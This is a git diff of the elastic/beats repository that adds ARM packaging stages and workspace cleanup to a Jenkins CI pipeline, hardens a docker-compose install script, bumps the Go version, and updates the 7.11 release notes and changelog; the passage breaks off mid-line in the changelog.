diff --git a/.backportrc.json b/.backportrc.json index ef4e81dc5802..51dc238ee78e 100644 --- a/.backportrc.json +++ b/.backportrc.json @@ -1,6 +1,6 @@ { "upstream": "elastic/beats", - "branches": [ { "name": "7.x", "checked": true }, "7.11", "7.10" ], + "branches": [ { "name": "7.x", "checked": true }, "7.11" ], "labels": ["backport"], "autoAssign": true, "prTitle": "Cherry-pick to {targetBranch}: {commitMessages}" diff --git a/.ci/packaging.groovy b/.ci/packaging.groovy index 7af3ff6f60c6..34a5306eab37 100644 --- a/.ci/packaging.groovy +++ b/.ci/packaging.groovy @@ -17,6 +17,7 @@ pipeline { JOB_GCS_BUCKET = 'beats-ci-artifacts' JOB_GCS_BUCKET_STASH = 'beats-ci-temp' JOB_GCS_CREDENTIALS = 'beats-ci-gcs-plugin' + JOB_GCS_EXT_CREDENTIALS = 'beats-ci-gcs-plugin-file-credentials' DOCKERELASTIC_SECRET = 'secret/observability-team/ci/docker-registry/prod' DOCKER_REGISTRY = 'docker.elastic.co' GITHUB_CHECK_E2E_TESTS_NAME = 'E2E Tests' @@ -40,6 +41,7 @@ pipeline { parameters { booleanParam(name: 'macos', defaultValue: false, description: 'Allow macOS stages.') booleanParam(name: 'linux', defaultValue: true, description: 'Allow linux stages.') + booleanParam(name: 'arm', defaultValue: true, description: 'Allow ARM stages.') } stages { stage('Filter build') { @@ -83,12 +85,13 @@ pipeline { } } setEnvVar("GO_VERSION", readFile("${BASE_DIR}/.go-version").trim()) + // Stash without any build/dependencies context to support different architectures. + stashV2(name: 'source', bucket: "${JOB_GCS_BUCKET_STASH}", credentialsId: "${JOB_GCS_CREDENTIALS}") withMageEnv(){ dir("${BASE_DIR}"){ setEnvVar('BEAT_VERSION', sh(label: 'Get beat version', script: 'make get-version', returnStdout: true)?.trim()) } } - stashV2(name: 'source', bucket: "${JOB_GCS_BUCKET_STASH}", credentialsId: "${JOB_GCS_CREDENTIALS}") } } stage('Build Packages'){ @@ -172,12 +175,74 @@ pipeline { } steps { withGithubNotify(context: "Packaging MacOS ${BEATS_FOLDER}") { - deleteDir() + deleteWorkspace() withMacOSEnv(){ release() } } } + post { + always { + // static workers require this + deleteWorkspace() + } + } + } + } + } + } + stage('Build Packages ARM'){ + matrix { + axes { + axis { + name 'BEATS_FOLDER' + values ( + 'auditbeat', + 'filebeat', + 'heartbeat', + 'journalbeat', + 'metricbeat', + 'packetbeat', + 'x-pack/auditbeat', + 'x-pack/dockerlogbeat', + 'x-pack/elastic-agent', + 'x-pack/filebeat', + 'x-pack/heartbeat', + 'x-pack/metricbeat', + 'x-pack/packetbeat' + ) + } + } + stages { + stage('Package Docker images for linux/arm64'){ + agent { label 'arm' } + options { skipDefaultCheckout() } + when { + beforeAgent true + expression { + return params.arm + } + } + environment { + HOME = "${env.WORKSPACE}" + PACKAGES = "docker" + PLATFORMS = [ + 'linux/arm64', + ].join(' ') + } + steps { + withGithubNotify(context: "Packaging linux/arm64 ${BEATS_FOLDER}") { + deleteWorkspace() + release() + pushCIDockerImages() + } + } + post { + always { + // static workers require this + deleteWorkspace() + } + } } } } @@ -385,14 +450,11 @@ def publishPackages(baseDir){ uploadPackages("${bucketUri}/${beatsFolderName}", baseDir) } -def uploadPackages(bucketUri, baseDir){ - googleStorageUpload(bucket: bucketUri, - credentialsId: "${JOB_GCS_CREDENTIALS}", - pathPrefix: "${baseDir}/build/distributions/", - pattern: "${baseDir}/build/distributions/**/*", - sharedPublicly: true, - showInline: true - ) +def uploadPackages(bucketUri, beatsFolder){ + googleStorageUploadExt(bucket: bucketUri, + credentialsId: "${JOB_GCS_EXT_CREDENTIALS}", + pattern: "${beatsFolder}/build/distributions/**/*", + sharedPublicly: true) } /** @@ -408,14 +470,43 @@ def getBeatsName(baseDir) { } def withBeatsEnv(Closure body) { + unstashV2(name: 'source', bucket: "${JOB_GCS_BUCKET_STASH}", credentialsId: "${JOB_GCS_CREDENTIALS}") + fixPermissions() withMageEnv(){ withEnv([ "PYTHON_ENV=${WORKSPACE}/python-env" ]) { - unstashV2(name: 'source', bucket: "${JOB_GCS_BUCKET_STASH}", credentialsId: "${JOB_GCS_CREDENTIALS}") dir("${env.BASE_DIR}"){ body() } } } } + +/** +* This method fixes the filesystem permissions after the build has happenend. The reason is to +* ensure any non-ephemeral workers don't have any leftovers that could cause some environmental +* issues. +*/ +def deleteWorkspace() { + catchError(buildResult: 'SUCCESS', stageResult: 'SUCCESS') { + fixPermissions() + deleteDir() + } +} + +def fixPermissions() { + if(isUnix()) { + catchError(buildResult: 'SUCCESS', stageResult: 'SUCCESS') { + dir("${env.BASE_DIR}") { + if (fileExists('script/fix_permissions.sh')) { + sh(label: 'Fix permissions', script: """#!/usr/bin/env bash + set +x + source ./dev-tools/common.bash + docker_setup + script/fix_permissions.sh ${WORKSPACE}""", returnStatus: true) + } + } + } + } +} diff --git a/.ci/scripts/install-docker-compose.sh b/.ci/scripts/install-docker-compose.sh index 72d889f216af..bfc7ba17629a 100755 --- a/.ci/scripts/install-docker-compose.sh +++ b/.ci/scripts/install-docker-compose.sh @@ -23,5 +23,12 @@ DC_CMD="${HOME}/bin/docker-compose" mkdir -p "${HOME}/bin" -curl -sSLo "${DC_CMD}" "https://github.com/docker/compose/releases/download/${DOCKER_COMPOSE_VERSION}/docker-compose-$(uname -s)-$(uname -m)" -chmod +x "${DC_CMD}" +if curl -sSLo "${DC_CMD}" "https://github.com/docker/compose/releases/download/${DOCKER_COMPOSE_VERSION}/docker-compose-$(uname -s)-$(uname -m)" ; then + chmod +x "${DC_CMD}" +else + echo "Something bad with the download, let's delete the corrupted binary" + if [ -e "${DC_CMD}" ] ; then + rm "${DC_CMD}" + fi + exit 1 +fi diff --git a/.gitignore b/.gitignore index 4f2f4f719b9f..2f5a63889a9b 100644 --- a/.gitignore +++ b/.gitignore @@ -23,6 +23,7 @@ coverage.out .python-version beat.db *.keystore +go_env.properties mage_output_file.go x-pack/functionbeat/*/fields.yml x-pack/functionbeat/provider/*/functionbeat-* diff --git a/.go-version b/.go-version index 545fd574d35b..98e863cdf81f 100644 --- a/.go-version +++ b/.go-version @@ -1 +1 @@ -1.15.7 +1.15.8 diff --git a/CHANGELOG-developer.next.asciidoc b/CHANGELOG-developer.next.asciidoc index 51a4565e4ff2..2b319225a972 100644 --- a/CHANGELOG-developer.next.asciidoc +++ b/CHANGELOG-developer.next.asciidoc @@ -104,6 +104,8 @@ The list below covers the major changes between 7.0.0-rc2 and master only. - Update Go version to 1.14.7. {pull}20508[20508] - Add packaging for docker image based on UBI minimal 8. {pull}20576[20576] - Make the mage binary used by the build process in the docker container to be statically compiled. {pull}20827[20827] +- Add Pensando distributed firewall module. {pull}21063[21063] - Update ecszap to v0.3.0 for using ECS 1.6.0 in logs {pull}22267[22267] - Add support for customized monitoring API. {pull}22605[22605] - Update Go version to 1.15.7. {pull}22495[22495] +- Update Go version to 1.15.8. {pull}23955[23955] diff --git a/CHANGELOG.asciidoc b/CHANGELOG.asciidoc index 9da8d0215065..0d1ea0d2ebee 100644 --- a/CHANGELOG.asciidoc +++ b/CHANGELOG.asciidoc @@ -3,6 +3,248 @@ :issue: https://github.com/elastic/beats/issues/ :pull: https://github.com/elastic/beats/pull/ +[[release-notes-7.11.1]] +=== Beats version 7.11.1 +https://github.com/elastic/beats/compare/v7.11.0...v7.11.1[View commits] + +==== Bugfixes + +*Filebeat* + +- Fix goroutines leak with some inputs in autodiscover. {pull}23722[23722] +- Fix various processing errors in the Suricata module. {pull}23236[23236] + +*Elastic Logging Plugin* + +- Fix out of date CLI flags on docs. {pull}23628[23628] + +[[release-notes-7.11.0]] +=== Beats version 7.11.0 +https://github.com/elastic/beats/compare/v7.10.2...v7.11.0[View commits] + +==== Breaking changes + +*Affecting all Beats* + +- Allow embedding of CAs, Certificate of private keys for anything that support TLS in ouputs and inputs. {pull}21179[21179] +- Update to ECS 1.7.0. {pull}22571[22571] +- Add support for SCRAM-SHA-512 and SCRAM-SHA-256 in Kafka output. {pull}12867[12867] + +*Auditbeat* + +- Use ECS 1.7 ingress/egress network directions instead of inbound/outbound for system/socket. {pull}22991[22991] +- Use ingress/egress instead of inbound/outbound for ECS 1.7 in auditd module. {pull}23000[23000] + +*Filebeat* + +- Add fileset to ingest Kibana's ECS audit logs. {pull}22696[22696] +- Remove `suricata.eve.timestamp` alias field. {issue}10535[10535] {pull}22095[22095] +- Rename bad ECS field name tracing.trace.id to trace.id in aws elb fileset. {pull}22571[22571] +- Fix parsing issues with nested JSON payloads in Elasticsearch audit log fileset. {pull}22975[22975] +- Rename `network.direction` values in crowdstrike/falcon to `ingress`/`egress`. {pull}23041[23041] + +*Heartbeat* +- Adds negative body match. {pull}20728[20728] + +*Metricbeat* + +- Change cloud.provider from googlecloud to gcp. {pull}21775[21775] +- Rename googlecloud module to gcp module. {pull}22246[22246] +- Use ingress/egress instead of inbound/outbound for system/socket metricset. {pull}22992[22992] +- Change types of numeric metrics from Kubelet summary api to double so as to cover big numbers. {pull}23335[23335] + +*Packetbeat* + +- Update how Packetbeat classifies network directionality to bring it in line with ECS 1.7 {pull}22996[22996] + +*Winlogbeat* + +- Use ECS 1.7 ingress/egress instead of inbound/outbound network.direction in sysmon. {pull}22997[22997] + +==== Bugfixes + +*Affecting all Beats* + +- Fix memory leak and events duplication in docker autodiscover and add_docker_metadata. {pull}21851[21851] +- Fix duplicated pod events in kubernetes autodiscover for pods with init or ephemeral containers. {pull}22438[22438] +- Fix FileVersion contained in Windows exe files. {pull}22581[22581] +- Log debug message if the Kibana dashboard can not be imported from the archive because of the invalid archive directory structure {issue}12211[12211], {pull}13387[13387] +- Periodic metrics in logs will now report `libbeat.output.events.active` and `beat.memstats.rss` as gauges (rather than counters). {pull}22877[22877] +- Use PROGRAMDATA environment variable instead of C:\ProgramData for windows install service {pull}22874[22874] +- Fix reporting of cgroup metrics when running under Docker {pull}22879[22879] +- Fix typo in config docs {pull}23185[23185] +- Fix panic due to unhandled DeletedFinalStateUnknown in k8s OnDelete {pull}23419[23419] +- Fix error loop with runaway CPU use when the Kafka output encounters some connection errors {pull}23484[23484] + +*Auditbeat* + +- file_integrity: stop monitoring excluded paths {issue}21278[21278] {pull}21282[21282] +- Note incompatibility of system/socket on ARM. {pull}23381[23381] + +*Filebeat* + +- Fix Zeek dashboard reference to `zeek.ssl.server.name` field. {pull}21696[21696] +- Fix network.direction logic in zeek connection fileset. {pull}22967[22967] +- Fix aws s3 overview dashboard. {pull}23045[23045] +- Fix bad `network.direction` values in Fortinet/firewall fileset. {pull}23072[23072] +- Fix Cisco ASA/FTD module's parsing of WebVPN log message 716002. {pull}22966[22966] +- Add support for organization and custom prefix in AWS/CloudTrail fileset. {issue}23109[23109] {pull}23126[23126] +- Simplify regex for organization custom prefix in AWS/CloudTrail fileset. {issue}23203[23203] {pull}23204[23204] +- Fix syslog header parsing in infoblox module. {issue}23272[23272] {pull}23273[23273] +- Fix concurrent modification exception in Suricata ingest node pipeline. {pull}23534[23534] +- Fix handling of ModifiedProperties field in Office 365. {pull}23777[23777] + +*Heartbeat* + +- Fixed missing `tls` fields when connecting to https via proxy. {issue}15797[15797] {pull}22190[22190] + +*Metricbeat* + +- Change Session ID type from int to string {pull}22359[22359] +- Fix filesystem types on Windows in filesystem metricset. {pull}22531[22531] +- Fix failiures caused by custom beat names with more than 15 characters {pull}22550[22550] +- Update NATS dashboards to leverage connection and route metricsets {pull}22646[22646] +- Fix rate metrics in Kafka broker metricset by using last minute rate instead of mean rate. {pull}22733[22733] +- Update config in `windows.yml` file. {issue}23027[23027]{pull}23327[23327] +- Fix metric grouping for windows/perfmon module {issue}23489[23489] {pull}23505[23505] + +*Packetbeat* + +- Fix SIP parser logic related to line length check. {pull}23411[23411] + + +*Winlogbeat* + +- Protect against accessing an undefined variable in Security module. {pull}22937[22937] +- Add source.ip validation for event ID 4778 in the Security module. {issue}19627[19627] + +==== Added + +*Affecting all Beats* + +- Add istiod metricset. {pull}21519[21519] +- Add support for OpenStack SSL metadata APIs in `add_cloud_metadata`. {pull}21590[21590] +- Add cloud.account.id for GCP into add_cloud_metadata processor. {pull}21776[21776] +- Add proxy metricset for istio module. {pull}21751[21751] +- Add kubernetes.node.hostname metadata of Kubernetes node. {pull}22189[22189] +- Enable always add_resource_metadata for Pods and Services of kubernetes autodiscovery. {pull}22189[22189] +- Add add_resource_metadata option setting (always enabled) for add_kubernetes_metadata setting. {pull}22189[22189] +- Add support for ephemeral containers in kubernetes autodiscover and `add_kubernetes_metadata`. {pull}22389[22389] {pull}22439[22439] +- Added support for wildcard fields and keyword fallback in beats setup commands. {pull}22521[22521] +- Fix polling node when it is not ready and monitor by hostname {pull}22666[22666] +- Add `expand_keys` option to `decode_json_fields` processor and `json` input, to recusively de-dot and expand json keys into hierarchical object structures {pull}22849[22849] +- Update k8s client and release k8s leader lock gracefully {pull}22919[22919] +- Improve event normalization performance {pull}22974[22974] +- Add tini as init system in docker images {pull}22137[22137] +- Added "detect_mime_type" processor for detecting mime types {pull}22940[22940] +- Added "add_network_direction" processor for determining perimeter-based network direction. {pull}23076[23076] +- Added new `rate_limit` processor for enforcing rate limits on event throughput. {pull}22883[22883] +- Allow node/namespace metadata to be disabled on kubernetes metagen and ensure add_kubernetes_metadata honors host {pull}23012[23012] +- Improve equals check. {pull}22778[22778] + +*Auditbeat* + +- Add several improvements for auditd module for improved ECS field mapping {pull}22647[22647] +- Add ECS 1.7 `configuration` categorization in certain events in auditd module. {pull}23000[23000] + +*Filebeat* + + +- Adding support for Oracle Database Audit Logs {pull}21991[21991] +- Add max_number_of_messages config into s3 input. {pull}21993[21993] +- Add SSL option to checkpoint module {pull}19560[19560] +- Added support for MySQL Enterprise audit logs. {pull}22273[22273] +- Rename googlecloud module to gcp module. {pull}22214[22214] +- Rename awscloudwatch input to aws-cloudwatch. {pull}22228[22228] +- Rename google-pubsub input to gcp-pubsub. {pull}22213[22213] +- Copy tag names from MISP data into events. {pull}21664[21664] +- Added TLS JA3 fingerprint, certificate not_before/not_after, certificate SHA1 hash, and certificate subject fields to Zeek SSL dataset. {pull}21696[21696] +- Add platform logs in the azure filebeat module. {pull}22371[22371] +- Added `event.ingested` field to data from the Netflow module. {pull}22412[22412] +- Improve panw ECS url fields mapping. {pull}22481[22481] +- Improve Nats filebeat dashboard. {pull}22726[22726] +- Add support for UNIX datagram sockets in `unix` input. {issues}18632[18632] {pull}22699[22699] +- Add `http.request.mime_type` for Elasticsearch audit log fileset. {pull}22975[22975] +- Add new httpjson input features and mark old config ones for deprecation {pull}22320[22320] +- Add configuration option to set external and internal networks for panw panos fileset {pull}22998[22998] +- Add `subbdomain` fields for rsa2elk modules. {pull}23035[23035] +- Add subdomain enrichment for suricata/eve fileset. {pull}23011[23011] +- Add subdomain enrichment for zeek/dns fileset. {pull}23011[23011] +- Add `event.category` "configuration" to auditd module events. {pull}23010[23010] +- Add `event.category` "configuration" to gsuite module events. {pull}23010[23010] +- Add `event.category` "configuration" to o365 module events. {pull}23010[23010] +- Add `event.category` "configuration" to zoom module events. {pull}23010[23010] +- Add `network.direction` to auditd/log fileset. {pull}23041[23041] +- Add logic for external network.direction in sophos xg fileset {pull}22973[22973] +- Preserve AWS CloudTrail eventCategory in aws.cloudtrail.event_category. {issue}22776[22776] {pull}22805[22805] +- Add top_level_domain enrichment for suricata/eve fileset. {pull}23046[23046] +- Add top_level_domain enrichment for zeek/dns fileset. {pull}23046[23046] +- Add `observer.egress.zone` and `observer.ingress.zone` for cisco/asa and cisco/ftd filesets. {pull}23068[23068] +- Allow cisco/asa and cisco/ftd filesets to override network directionality based off of zones. {pull}23068[23068] +- Allow cef and checkpoint modules to override network directionality based off of zones {pull}23066[23066] +- Add `network.direction` to netflow/log fileset. {pull}23052[23052] +- Add the ability to override `network.direction` based on interfaces in Fortinet/firewall fileset. {pull}23072[23072] +- Add `network.direction` override by specifying `internal_networks` in gcp module. {pull}23081[23081] +- Migrate microsoft/defender_atp to httpjson v2 config {pull}23017[23017] +- Migrate microsoft/m365_defender to httpjson v2 config {pull}23018[23018] +- Migrate okta to httpjson v2 config {pull}23059[23059] +- Add support for Snyk Vulnerability and Audit API. {pull}22677[22677] +- Misp improvements: Migration to httpjson v2 config, pagination and deduplication ID {pull}23070[23070] +- Add Google Workspace module and mark Gsuite module as deprecated {pull}22950[22950] +- Mark m365 defender, defender atp, okta and google workspace modules as GA {pull}23113[23113] +- Added `alternative_host` option to google pubsub input {pull}23215[23215] + +*Heartbeat* + +- Add mime type detection for http responses. {pull}22976[22976] + +*Metricbeat* + +- Move s3_daily_storage and s3_request metricsets to use cloudwatch input. {pull}21703[21703] +- Duplicate system.process.cmdline field with process.command_line ECS field name. {pull}22325[22325] +- Add awsfargate module task_stats metricset to monitor AWS ECS Fargate. {pull}22034[22034] +- Add connection and route metricsets for nats metricbeat module to collect metrics per connection/route. {pull}22445[22445] +- Add unit file states to system/service {pull}22557[22557] +- `kibana` module: `stats` metricset no-longer collects usage-related data. {pull}22732[22732] +- Add more TCP states to Metricbeat system socket_summary. {pull}14347[14347] +- Add io.ops in fields exported by system.diskio. {pull}22066[22066] +- Adjust the Apache status fields in the fleet mode. {pull}22821[22821] +- Add AWS Fargate overview dashboard. {pull}22941[22941] +- Add process.state, process.cpu.pct, process.cpu.start_time and process.memory.pct. {pull}22845[22845] +- Move IIS module to GA and map fields. {issue}22609[22609] {pull}23024[23024] +- Apache: convert status.total_kbytes to status.total_bytes in fleet mode. {pull}23022[23022] +- Release MSSQL as GA {pull}23146[23146] + +*Packetbeat* + +- Add support for overriding the published index on a per-protocol/flow basis. {pull}22134[22134] +- Change build process for x-pack distribution {pull}21979[21979] +- Tuned the internal queue size to reduce the chances of events being dropped. {pull}22650[22650] +- Add support for "http.request.mime_type" and "http.response.mime_type". {pull}22940[22940] + +*Winlogbeat* + +- Add file.pe and process.pe fields to ProcessCreate & LoadImage events in Sysmon module. {issue}17335[17335] {pull}22217[22217] +- Add dns.question.subdomain fields for sysmon DNS events. {pull}22999[22999] +- Add additional event categorization for security and sysmon modules. {pull}22988[22988] +- Add dns.question.top_level_domain fields for sysmon DNS events. {pull}23046[23046] + +*Elastic Log Driver* + +- Add new winlogbeat security dashboard {pull}18775[18775] + +==== Deprecated + +*Filebeat* + +- The experimental modules for Citrix Netscaler and Symantec Endpoint Protection have been removed. + As we continue to expand our coverage of common security data sources, we may consider supporting + Citrix Netscaler and Symantec Endpoint Protection in a future release. {issue}23129[23129] {pull}23130[23130] + +==== Known Issue + + + [[release-notes-7.10.2]] === Beats version 7.10.2 https://github.com/elastic/beats/compare/v7.10.1\...v7.10.2[View commits] diff --git a/CHANGELOG.next.asciidoc b/CHANGELOG.next.asciidoc index 6519a578ffb7..f2f64493d0f9 100644 --- a/CHANGELOG.next.asciidoc +++ b/CHANGELOG.next.asciidoc @@ -16,8 +16,6 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Libbeat: Do not overwrite agent.*, ecs.version, and host.name. {pull}14407[14407] - Libbeat: Cleanup the x-pack licenser code to use the new license endpoint and the new format. {pull}15091[15091] - Refactor metadata generator to support adding metadata across resources {pull}14875[14875] -- Variable substitution from environment variables is not longer supported. {pull}15937[15937] -- Change aws_elb autodiscover provider field name from elb_listener.* to aws.elb.*. {issue}16219[16219] {pull}16402[16402] - Remove `AddDockerMetadata` and `AddKubernetesMetadata` processors from the `script` processor. They can still be used as normal processors in the configuration. {issue}16349[16349] {pull}16514[16514] - Introduce APM libbeat instrumentation, active when running the beat with ELASTIC_APM_ACTIVE=true. {pull}17938[17938] - Remove the non-ECS `agent.hostname` field. Use the `agent.name` or `agent.id` fields for an identifier. {issue}16377[16377] {pull}18328[18328] @@ -33,6 +31,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - API address is a required setting in `add_cloudfoundry_metadata`. {pull}21759[21759] - Update to ECS 1.7.0. {pull}22571[22571] - Add support for SCRAM-SHA-512 and SCRAM-SHA-256 in Kafka output. {pull}12867[12867] +- Fix panic with inline SSL when the certificate or key were small than 256 bytes. {pull}23820[23820] *Auditbeat* @@ -44,9 +43,11 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Use ECS 1.7 ingress/egress network directions instead of inbound/outbound. {pull}22991[22991] - Use ingress/egress instead of inbound/outbound for ECS 1.7 in auditd module. {pull}23000[23000] +*Auditbeat* + + *Filebeat* -- Add fileset to ingest Kibana's ECS audit logs. {pull}22696[22696] - Fix parsing of Elasticsearch node name by `elasticsearch/slowlog` fileset. {pull}14547[14547] - Improve ECS field mappings in panw module. event.outcome now only contains success/failure per ECS specification. {issue}16025[16025] {pull}17910[17910] - Improve ECS categorization field mappings for nginx module. http.request.referrer only populated when nginx sets a value {issue}16174[16174] {pull}17844[17844] @@ -101,9 +102,9 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Fix parsing issues with nested JSON payloads in Elasticsearch audit log fileset. {pull}22975[22975] - Rename `network.direction` values in crowdstrike/falcon to `ingress`/`egress`. {pull}23041[23041] - Rename `s3` input to `aws-s3` input. {pull}23469[23469] +- Add `nodes` to filebeat-kubernetes.yaml ClusterRole. {issue}24051[24051] {pull}24052[24052] *Heartbeat* -- Adds negative body match. {pull}20728[20728] *Journalbeat* @@ -116,7 +117,6 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Add Tomcat overview dashboard {pull}14026[14026] - Move service config under metrics and simplify metric types. {pull}18691[18691] - Fix ECS compliance of user.id field in system/users metricset {pull}19019[19019] -- Rename googlecloud stackdriver metricset to metrics. {pull}19718[19718] - Remove "invalid zero" metrics on Windows and Darwin, don't report linux-only memory and diskio metrics when running under agent. {pull}21457[21457] - Change cloud.provider from googlecloud to gcp. {pull}21775[21775] - API address and shard ID are required settings in the Cloud Foundry module. {pull}21759[21759] @@ -127,6 +127,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - kubernetes.container.cpu.limit.cores and kubernetes.container.cpu.requests.cores are now floats. {issue}11975[11975] - Change types of numeric metrics from Kubelet summary api to double so as to cover big numbers. {pull}23335[23335] - Add container.image.name and containe.name ECS fields for state_container. {pull}23802[23802] +- Add support for the MemoryPressure, DiskPressure, OutOfDisk and PIDPressure status conditions in state_node. {pull}[23905] *Packetbeat* @@ -134,7 +135,6 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - `event.category` no longer contains the value `network_traffic` because this is not a valid ECS event category value. {pull}20556[20556] - Added redact_headers configuration option, to allow HTTP request headers to be redacted whilst keeping the header field included in the beat. {pull}15353[15353] - Add dns.question.subdomain and dns.question.top_level_domain fields. {pull}14578[14578] -- Update how Packetbeat classifies network directionality to bring it in line with ECS 1.7 {pull}22996[22996] *Winlogbeat* @@ -165,7 +165,6 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Allow users to configure only `cluster_uuid` setting under `monitoring` namespace. {pull}14338[14338] - Update replicaset group to apps/v1 {pull}15854[15802] - Fix Kubernetes autodiscovery provider to correctly handle pod states and avoid missing event data {pull}17223[17223] -- Fix `add_cloud_metadata` to better support modifying sub-fields with other processors. {pull}13808[13808] - Fix missing output in dockerlogbeat {pull}15719[15719] - Do not load dashboards where not available. {pull}15802[15802] - Fix issue where TLS settings would be ignored when a forward proxy was in use. {pull}15516[15516] @@ -205,7 +204,6 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Server-side TLS config now validates certificate and key are both specified {pull}19584[19584] - Fix terminating pod autodiscover issue. {pull}20084[20084] - Fix seccomp policy for calls to `chmod` and `chown`. {pull}20054[20054] -- Remove unnecessary restarts of metricsets while using Node autodiscover {pull}19974[19974] - Output errors when Kibana index pattern setup fails. {pull}20121[20121] - Fix issue in autodiscover that kept inputs stopped after config updates. {pull}20305[20305] - Log debug message if the Kibana dashboard can not be imported from the archive because of the invalid archive directory structure {issue}12211[12211], {pull}13387[13387] @@ -269,7 +267,6 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Fix mapping error for cloudtrail additionalEventData field {pull}16088[16088] - Fix a connection error in httpjson input. {pull}16123[16123] - Fix integer overflow in S3 offsets when collecting very large files. {pull}22523[22523] -- Fix various processing errors in the Suricata module. {pull}23236[23236] - Fix CredentialsJSON unpacking for `gcp-pubsub` and `httpjson` inputs. {pull}23277[23277] - CheckPoint Firewall module: Change event.severity JSON data type to a number because the field mapping is a `long`. {pull}23424[23424] - Cisco IOS: Change icmp.type/code and igmp.type JSON data types to strings because the fields mappings are `keyword`. {pull}23424[23424] @@ -281,7 +278,6 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Change the `event.created` in Netflow events to be the time the event was created by Filebeat to be consistent with ECS. {pull}23094[23094] - Update `filestream` reader offset when a line is skipped. {pull}23417[23417] -- Fix goroutines leak with some inputs in autodiscover. {pull}23722[23722] *Filebeat* @@ -296,6 +292,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Add queue_url definition in manifest file for aws module. {pull}16640[16640] - Fix issue where autodiscover hints default configuration was not being copied. {pull}16987[16987] - Fix Elasticsearch `_id` field set by S3 and Google Pub/Sub inputs. {pull}17026[17026] +- Add queue_url definition in manifest file for aws module. {pull}16640{16640} - Fixed various Cisco FTD parsing issues. {issue}16863[16863] {pull}16889[16889] - Fix default index pattern in IBM MQ filebeat dashboard. {pull}17146[17146] - Fix `elasticsearch.gc` fileset to not collect _all_ logs when Elasticsearch is running in Docker. {issue}13164[13164] {issue}16583[16583] {pull}17164[17164] @@ -381,12 +378,17 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Fix concurrent modification exception in Suricata ingest node pipeline. {pull}23534[23534] - Fix Zoom module parameters for basic auth and url path. {pull}23779[23779] - Fix handling of ModifiedProperties field in Office 365. {pull}23777[23777] +- Use rfc6587 framing for fortinet firewall and clientendpoint filesets when transferring over tcp. {pull}23837[23837] +- Fix httpjson input logging so it doesn't conflict with ECS. {pull}23972[23972] +- Fix Okta default date formatting. {issue}24018[24018] {pull}24025[24025] +- Fix Logstash module handling of logstash.log.log_event.action field. {issue}20709[20709] +- aws/s3access dataset was populating event.duration using the wrong unit. {pull}23920[23920] +- Zoom module pipeline failed to ingest some chat_channel events. {pull}23904[23904] *Heartbeat* - Fixed excessive memory usage introduced in 7.5 due to over-allocating memory for HTTP checks. {pull}15639[15639] - Fixed TCP TLS checks to properly validate hostnames, this broke in 7.x and only worked for IP SANs. {pull}17549[17549] -- Fixed missing `tls` fields when connecting to https via proxy. {issue}15797[15797] {pull}22190[22190] *Heartbeat* @@ -500,10 +502,12 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Add stack monitoring section to elasticsearch module documentation {pull}#23286[23286] - Fix metric grouping for windows/perfmon module {issue}23489[23489] {pull}23505[23505] - Add check for iis/application_pool metricset for nil worker process id values. {issue}23605[23605] {pull}23647[23647] +- Fix ec2 metricset fields.yml and the integration test {pull}23726[23726] +- Unskip s3_request integration test. {pull}23887[23887] +- Add system.hostfs configuration option for system module. {pull}23831[23831] *Packetbeat* -- Fix SIP parser logic related to line length check. {pull}23411[23411] *Winlogbeat* @@ -517,7 +521,6 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d *Functionbeat* *Elastic Logging Plugin* -- Fix out of date CLI flags on docs. {pull}23628[23628] ==== Added @@ -602,7 +605,9 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Update the baseline version of Sarama (Kafka support library) to 1.27.2. {pull}23595[23595] - Add kubernetes.volume.fs.used.pct field. {pull}23564[23564] - Add the `enable_krb5_fast` flag to the Kafka output to explicitly opt-in to FAST authentication. {pull}23629[23629] +- Added new decode_xml processor to libbeat that is available to all beat types. {pull}23678[23678] - Add deployment name in pod's meta. {pull}23610[23610] +- Added ECS 1.8 `host.os.type` field to `add_host_metadata` processor. {pull}23513[23513] - Add `selector` information in kubernetes services' metadata. {pull}23730[23730] *Auditbeat* @@ -624,6 +629,8 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Add several improvements for auditd module for improved ECS field mapping {pull}22647[22647] - Add ECS 1.7 `configuration` categorization in certain events in auditd module. {pull}23000[23000] - Improve file_integrity monitoring when a file is created/deleted in quick succession. {issue}17347[17347] {pull}22170[22170] +- system/host: Add new ECS 1.8 field `os.type` in `host.os.type`. {pull}23513[23513] +- Update Auditbeat auditd module to ECS 1.8 {pull}23594[23594] {issue}23118[23118] *Filebeat* @@ -768,19 +775,9 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Improve Zeek x509 module with `x509` ECS mappings {pull}20867[20867] - Improve Zeek SSL module with `x509` ECS mappings {pull}20927[20927] - Added new properties field support for event.outcome in azure module {pull}20998[20998] -- Improve Zeek Kerberos module with `x509` ECS mappings {pull}20958[20958] -- Improve Fortinet firewall module with `x509` ECS mappings {pull}20983[20983] -- Improve Santa module with `x509` ECS mappings {pull}20976[20976] -- Improve Suricata Eve module with `x509` ECS mappings {pull}20973[20973] -- Added new module for 